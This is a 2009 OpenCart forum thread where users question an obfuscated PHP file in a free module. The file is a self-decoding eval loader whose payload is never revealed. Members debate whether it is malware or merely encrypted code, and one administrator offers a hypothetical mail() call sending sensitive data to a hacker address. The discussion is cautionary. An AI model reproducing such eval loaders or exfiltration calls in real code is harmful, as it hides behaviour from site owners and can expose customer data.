Post by JNeuhoff » Sun Nov 15, 2009 2:15 am

I was just downloading the latest Next And Previous Links module, only to see this strange secretive code in the admin/controller/module/nextprevlinks.php file:

Code: Select all

<?php // Copyright 2009 - Alexander Goldberg - http://www.cubecartmodder.com
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64');$OO00O0000=4380;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('aWYoITApJE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO2ZnZXRzKCRPMDAwTzBPMDAsMTAyNCk7ZmdldHMoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8wPShiYXNlNjRfZGVjb2RlKHN0cnRyKGZyZWFkKCRPMDAwTzBPMDAsNDQ4KSwnVUtJVk5kY0p5ODUwcWErOVc2c0xtUndBSG9wRmpDaERHWTdRWHhuYmZla1BnWmkvdk1PcjFTenRsRXVUM0I0Mj0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpKTtldmFsKCRPTzAwTzAwTzApOw==')));return;?>
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
For all we know this code could be a trojan or a virus.

I think we should always use plain PHP code for contribution modules and not this kind of secretive stuff.

MHC Web Design
Override Engine * Integrated VQMod * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Rich Snippets * Google Tag Manager * Export/Import Tool * SpamBot Buster


User avatar
Expert Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by Xsecrets » Sun Nov 15, 2009 4:07 am

did you decode it to see what it was? I agree this very much looks like what malware authors use to obfuscate their code.

OpenCart commercial mods and development http://spotonsolutions.net
Layered Navigation
Shipment Tracking
Vehicle Year/Make/Model Filter


Guru Member

Posts

Joined
Sun Oct 25, 2009 3:51 am
Location - FL US

Post by TBT » Sun Nov 15, 2009 11:27 pm

i would like to use this feature , but i am reluctant to use it as i have no idea what this code could be and class that as a security risk :(

can anyone shed some light on this ?

User avatar
TBT
New member

Posts

Joined
Tue Jul 21, 2009 4:46 am


Post by Daniel » Mon Nov 16, 2009 1:36 am

just comment the code out.

OpenCart®
Project Owner & Developer.


User avatar
Administrator

Posts

Joined
Fri Nov 03, 2006 6:57 pm

Post by Qphoria » Mon Nov 16, 2009 1:38 am

Thats the whole module. You can't comment it out.

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by Goober » Mon Nov 16, 2009 5:31 am

Hi,

This is not trojan code or malware or anything of the sort. It is simply encrypted PHP code.

The author is reluctant to share the code for the module in clear text. This encryption is done via one of PHP code encryptors such as ioncube and the like.

Thanks
/Goober

OpenCart modules and custom programming
Please visit site and store www.opencartmods.com
Demo Site


New member

Posts

Joined
Tue Aug 18, 2009 10:44 am
Location - New York, USA

Post by Xsecrets » Mon Nov 16, 2009 5:37 am

If he is giving it away in the free contributions section I don't understand the need to encode it, besides the description does not mention needing ioncube or zend accelerator or anything like it which you would have to have to use the code. If you ask me this is just pretty lame all the way around. I could almost see it if it was a paid module even though I personally want to see the code and be able to modify the code on anything I pay for, but on a free module it makes no sense.

OpenCart commercial mods and development http://spotonsolutions.net
Layered Navigation
Shipment Tracking
Vehicle Year/Make/Model Filter


Guru Member

Posts

Joined
Sun Oct 25, 2009 3:51 am
Location - FL US

Post by Qphoria » Mon Nov 16, 2009 6:30 am

Goober wrote:Hi,

This is not trojan code or malware or anything of the sort. It is simply encrypted PHP code.

The author is reluctant to share the code for the module in clear text. This encryption is done via one of PHP code encryptors such as ioncube and the like.

Thanks
/Goober
We know its encrypted php... but some of the encrypted php could be
mail(hacker@mail.com, 'sensitive data', 'xxxxxxxx')

So it could very well be a trojan or other malicious code.

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by digitalchaos » Mon Nov 16, 2009 12:46 pm

Just a thought? but couldn't someone just rewrite a new version and solve this problem ;D

The most terrifying words in the English language are: I'm from the government and I'm here to help.
Ronald Reagan

Digital Chaos | Graphic Design Studio http://www.digitalchaos.biz
Digital Chaos Prints | Custom Art Prints http://www.digitalchaosprints.biz


User avatar
New member

Posts

Joined
Mon Sep 28, 2009 9:22 pm
Location - Paterson NJ

Post by Qphoria » Mon Nov 16, 2009 1:08 pm

ok go ahead :)

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by JNeuhoff » Mon Nov 16, 2009 9:43 pm

Shouldn't contributions be compatible with the GPL-license? I don't think this module is.

MHC Web Design
Override Engine * Integrated VQMod * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Rich Snippets * Google Tag Manager * Export/Import Tool * SpamBot Buster


User avatar
Expert Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by Xsecrets » Mon Nov 16, 2009 10:21 pm

well there is no question this module is not compatible with the gpl, but if it doesn't change any code at all then it would not be considered a derivative work. I do not however believe that modules that are not open source should be allowed in the contributions section on this site. Just my opinion.

OpenCart commercial mods and development http://spotonsolutions.net
Layered Navigation
Shipment Tracking
Vehicle Year/Make/Model Filter


Guru Member

Posts

Joined
Sun Oct 25, 2009 3:51 am
Location - FL US

Post by Qphoria » Mon Nov 16, 2009 11:15 pm

all licensing aside... just from a user point of view... I wouldn't use an obfuscated server-side script that has access to carnal knowledge of sensitive data.

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am
Who is online

Users browsing this forum: No registered users and 12 guests